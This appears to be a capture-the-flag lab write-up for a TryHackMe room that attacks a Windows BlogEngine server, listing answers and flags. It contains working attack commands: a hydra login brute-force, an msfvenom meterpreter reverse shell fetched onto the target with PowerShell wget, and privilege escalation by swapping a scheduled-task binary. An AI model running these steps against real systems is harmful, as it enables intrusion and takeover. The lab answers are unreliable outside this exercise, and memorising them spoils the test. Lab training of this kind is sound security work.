No answer needed

Pennywise

Use the Network-Tab of the Developer-Tools on your device, go to the login page and try to login to the site. In the network-tab you find the attempted login including the request type.

POST

Use the Network-Tab of the Developert-Tools again. Send a request and copy the request in its raw-form. Exchange the username for "admin" and the password with "^PASS^". Now run hydra -t 64 -l admin -P /Path/to/wordlists IP http-post-form "/Account/login.aspx?ReturnURL=/admin/:Request:Login failed" and you get the password.

1qaz2wsx

No answer needed

Navigate to "IP/admin/about.cshtml" and you get the answer.

3.3.6.0

Go to https://www.exploit-db.com/ and search for "BlogEngine". Select the exploit with the correct version and marked as verified.

CVE-2019-6714

Download the found exploit and follow the given instructions. After the reverse-shell is established you can run whoami to get the desired information.

iis apppool\blog

THM gives us the tip to generate a reverse-shell, upload it and execute it manually. To do so run msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST=YOUR_IP LPORT=YOUR_PORT -f exe -o shell.exe on your device. In the same directory run python3 -m http.server PORT to start a server. On the target device run powershell -c wget "http://IP:PORT/shell.exe" -outfile "shell.exe". On your device start metasploit by running mfsconsole. Enter use exploit/multi/handlerandset payload windows/meterpreter/reverse_tcpset the options to the specifics of your device and start the handler. On the target device start the shell by enteringshell.exe` and a meterpreter-reverse-shell should be established.

No answer needed

Run 'sysinfo'

Windows 2012 R2 (6.3 Build 9600).

Get a winPEAS.exe and upload it to the target and run it using the initial shell. Among the running processes one process is marked by winPEAS: "WScheduler.exe" the "W" stands for "Windows"

WindowsScheduler

In the results of winPEAS check for the section "Services Information - Interesting Services". Two of the services stand out. Use searchsploit on the services and we discover that there is information for the Windowsscheduler. In the reverse-shell move into "C:\Program Files (x86)\SystemScheduler\Events" check the textfile in the directory and you will see that the Event started was "Message.exe".

Message.exe

Stop the meterpreter-shell. In the initial reverse-shell move to "C:\Program Files (x86)\SystemScheduler" and rename the "message.exe" by running rename "message.exe" "message.bak" and download the meterpreter-shell by running powershell -c wget "http://IP:PORT/shell.exe" -oufile "message.exe". Start the meterpreter-handler again and you get a new shell now as the administrator. Change the directory to "C:\Users\jeff\Desktop" and run cat user.txt to get the flag.

759bd8af507517bcfaede78a21a73e39

Move the shell to "C:\Users\Administrator\Desktop" and run cat root.txt to get the final flag.

7e13d97f05f7ceb9881a3eb3d78d3e72

No answer needed

No answer needed

Instead of using winPeas just run systeminfo

8/3/2019, 10:43:23 AM